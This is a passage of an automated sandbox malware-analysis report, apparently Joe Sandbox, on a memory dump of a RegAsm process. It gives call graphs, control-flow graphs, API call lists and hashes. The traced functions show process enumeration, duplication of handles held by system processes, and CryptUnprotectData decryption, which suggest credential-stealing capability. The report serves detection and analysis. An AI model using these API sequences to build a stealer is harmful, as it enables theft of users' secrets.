43a765 40074->40076 40075->40076 40163 42a115 40075->40163 40076->39906 40083 4397fd memset 40076->40083 40080 43a73d 40080->40076 40081 42a115 146 API calls 40080->40081 40081->40076 40082->39901 40083->39909 40084->39906 40085->39924 40086->39913 40087->39917 40088->39914 40089->39918 40090->39922 40091->39926 40092->39928 40093->39931 40094->39938 40095->39937 40096->39942 40097->39950 40098->39935 40099->39943 40100->39946 40101->39949 40102->39949 40103->39958 40104->39961 40105->39966 40106->39970 40107->39978 40108->39985 40109->39992 40110->40006 40111->40013 40112->40030 40113->40030 40114->40030 40115->40026 40116->40033 40117->40038 40118->40011 40119->40011 40120->40011 40121->40009 40122->40016 40123->40019 40124->40022 40125->40027 40126->40032 40127->40035 40128->40039 40129->40045 40130->40046 40131->40045 40132->40049 40133->40051 40134->40053 40135->40055 40136->40057 40137->40059 40138->40061 40139->40063 40140->40065 40141->40067 40142->40069 40143->39950 40144->39977 40145->39972 40146->39979 40147->39982 40148->39988 40149->39994 40150->39963 40151->39971 40152->39976 40153->39980 40154->39990 40155->39993 40156->39999 40157->39994 40158->40002 40159->40004 40160->39950 40161->39955 40162->39906 40164 42a175 40163->40164 40166 42a122 40163->40166 40164->40076 40169 42b13b 146 API calls 40164->40169 40166->40164 40167 42a115 146 API calls 40166->40167 40170 43a174 40166->40170 40194 42a0a8 146 API calls 40166->40194 40167->40166 40169->40080 40184 43a196 40170->40184 40185 43a19e 40170->40185 40171 43a306 40171->40184 40208 4388c4 14 API calls 40171->40208 40174 42a115 146 API calls 40174->40185 40175 415a91 memset 40175->40185 40176 43a642 40176->40184 40213 4169a7 11 API calls 40176->40213 40180 43a635 40212 42c02e memset 40180->40212 40184->40166 40185->40171 40185->40174 40185->40175 40185->40184 40195 42ff8c 40185->40195 40203 4165ff 11 API calls 40185->40203 40204 439504 13 API calls 40185->40204 40205 4312d0 146 API calls 40185->40205 40206 42be4c memcpy memcpy memcpy memset memcpy 40185->40206 40207 43a121 11 API calls 40185->40207 40187 42bf4c 14 API calls 40189 43a325 40187->40189 40188 4169a7 11 API calls 40188->40189 40189->40176 40189->40180 40189->40184 40189->40187 40189->40188 40190 42b5b5 memset memcpy 40189->40190 40209 42b63e 14 API calls 40189->40209 40210 4165ff 11 API calls 40189->40210 40211 42bfcf memcpy 40189->40211 40190->40189 40194->40166 40214 43817e 40195->40214 40197 42ff99 40198 42ffe3 40197->40198 40199 42ffd0 40197->40199 40202 42ff9d 40197->40202 40219 4169a7 11 API calls 40198->40219 40218 4169a7 11 API calls 40199->40218 40202->40185 40203->40185 40204->40185 40205->40185 40206->40185 40207->40185 40208->40189 40209->40189 40210->40189 40211->40189 40212->40176 40213->40184 40215 438187 40214->40215 40217 438192 40214->40217 40220 4380f6 40215->40220 40217->40197 40218->40202 40219->40202 40222 43811f 40220->40222 40221 438164 40221->40217 40222->40221 40225 437e5e 40222->40225 40248 4300e8 memset memset memcpy 40222->40248 40249 437d3c 40225->40249 40227 437ea9 40228 437eb3 40227->40228 40234 437f22 40227->40234 40264 41f432 40227->40264 40228->40222 40231 437f06 40275 415c56 11 API calls 40231->40275 40233 437f95 40276 415c56 11 API calls 40233->40276 40235 437f7f 40234->40235 40236 432d4e 3 API calls 40234->40236 40235->40233 40237 43802b 40235->40237 40236->40235 40277 4165ff 11 API calls 40237->40277 40240 438054 40278 437371 137 API calls 40240->40278 40243 43806b 40244 438094 40243->40244 40279 42f50e 137 API calls 40243->40279 40245 437fa3 40244->40245 40280 4300e8 memset memset memcpy 40244->40280 40245->40228 40281 41f638 103 API calls 40245->40281 40248->40222 40250 437d69 40249->40250 40253 437d80 40249->40253 40282 437ccb 11 API calls 40250->40282 40252 437d76 40252->40227 40253->40252 40254 437da3 40253->40254 40257 437d90 40253->40257 40256 438460 133 API calls 40254->40256 40260 437dcb 40256->40260 40257->40252 40286 437ccb 11 API calls 40257->40286 40258 437de8 40285 424f26 122 API calls 40258->40285 40260->40258 40283 444283 13 API calls 40260->40283 40262 437dfc 40284 437ccb 11 API calls 40262->40284 40265 41f54d 40264->40265 40271 41f44f 40264->40271 40266 41f466 40265->40266 40316 41c635 memset memset 40265->40316 40266->40231 40266->40234 40271->40266 40273 41f50b 40271->40273 40287 41f1a5 40271->40287 40312 41c06f memcmp 40271->40312 40313 41f3b1 89 API calls 40271->40313 40314 41f398 85 API calls 40271->40314 40273->40265 40273->40266 40315 41c295 85 API calls 40273->40315 40275->40228 40276->40245 40277->40240 40278->40243 40279->40244 40280->40245 40281->40228 40282->40252 40283->40262 40284->40258 40285->40252 40286->40252 40288 41bc3b 100 API calls 40287->40288 40289 41f1b4 40288->40289 40290 41edad 85 API calls 40289->40290 40297 41f282 40289->40297 40291 41f1cb 40290->40291 40292 41f1f5 memcmp 40291->40292 40293 41f20e 40291->40293 40291->40297 40292->40293 40294 41f21b memcmp 40293->40294 40293->40297 40295 41f326 40294->40295 40298 41f23d 40294->40298 40296 41ee6b 85 API calls 40295->40296 40295->40297 40296->40297 40297->40271 40298->40295 40299 41f28e memcmp 40298->40299 40301 41c8df 55 API calls 40298->40301 40299->40295 40300 41f2a9 40299->40300 40300->40295 40303 41f308 40300->40303 40304 41f2d8 40300->40304 40302 41f269 40301->40302 40302->40295 40305 41f287 40302->40305 40306 41f27a 40302->40306 40303->40295 40310 4446ce 11 API calls 40303->40310 40307 41ee6b 85 API calls 40304->40307 40305->40299 40308 41ee6b 85 API calls 40306->40308 40309 41f2e0 40307->40309 40308->40297 40311 41b1ca memset 40309->40311 40310->40295 40311->40297 40312->40271 40313->40271 40314->40271 40315->40265 40316->40266 40317 41493c EnumResourceNamesW 40318 44660a 40321 4465e4 40318->40321 40320 446613 40322 4465f3 __dllonexit 40321->40322 40323 4465ed _onexit 40321->40323 40322->40320 40323->40322

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                                                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                                      • API String ID: 2018390131-3398334509
                                                                                                                                                                                                                      • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                                                      Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 519 413e79-413eae call 413959 call 413ca4 CloseHandle 512->519 520 413e28-413e35 512->520 516 413ec8-413eda call 4099f4 513->516 517 413ebf-413ec6 free 513->517 518 413edb-413ee2 516->518 517->518 525 413ee4 518->525 526 413ee7-413efe 518->526 519->511 522 413e61-413e68 520->522 523 413e37-413e44 GetModuleHandleW 520->523 522->519 529 413e6a-413e77 QueryFullProcessImageNameW 522->529 523->522 528 413e46-413e5c 523->528 525->526 526->508 528->522 529->519
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                                      • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                                                                                                                                                                      • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                                                                                                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 3957639419-1740548384
                                                                                                                                                                                                                      • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                                                                                                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                                                      Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                                      • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                      • String ID: BIN
                                                                                                                                                                                                                      • API String ID: 1668488027-1015027815
                                                                                                                                                                                                                      • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                      Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                                      • free.MSVCRT ref: 00418803
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1355100292-0
                                                                                                                                                                                                                      • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                                                                                                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                      Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51encryptionCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1945712969-0
                                                                                                                                                                                                                      • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                      Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFind$FirstNext
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1690352074-0
                                                                                                                                                                                                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                                      Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InfoSystemmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3558857096-0
                                                                                                                                                                                                                      • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                                                      Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
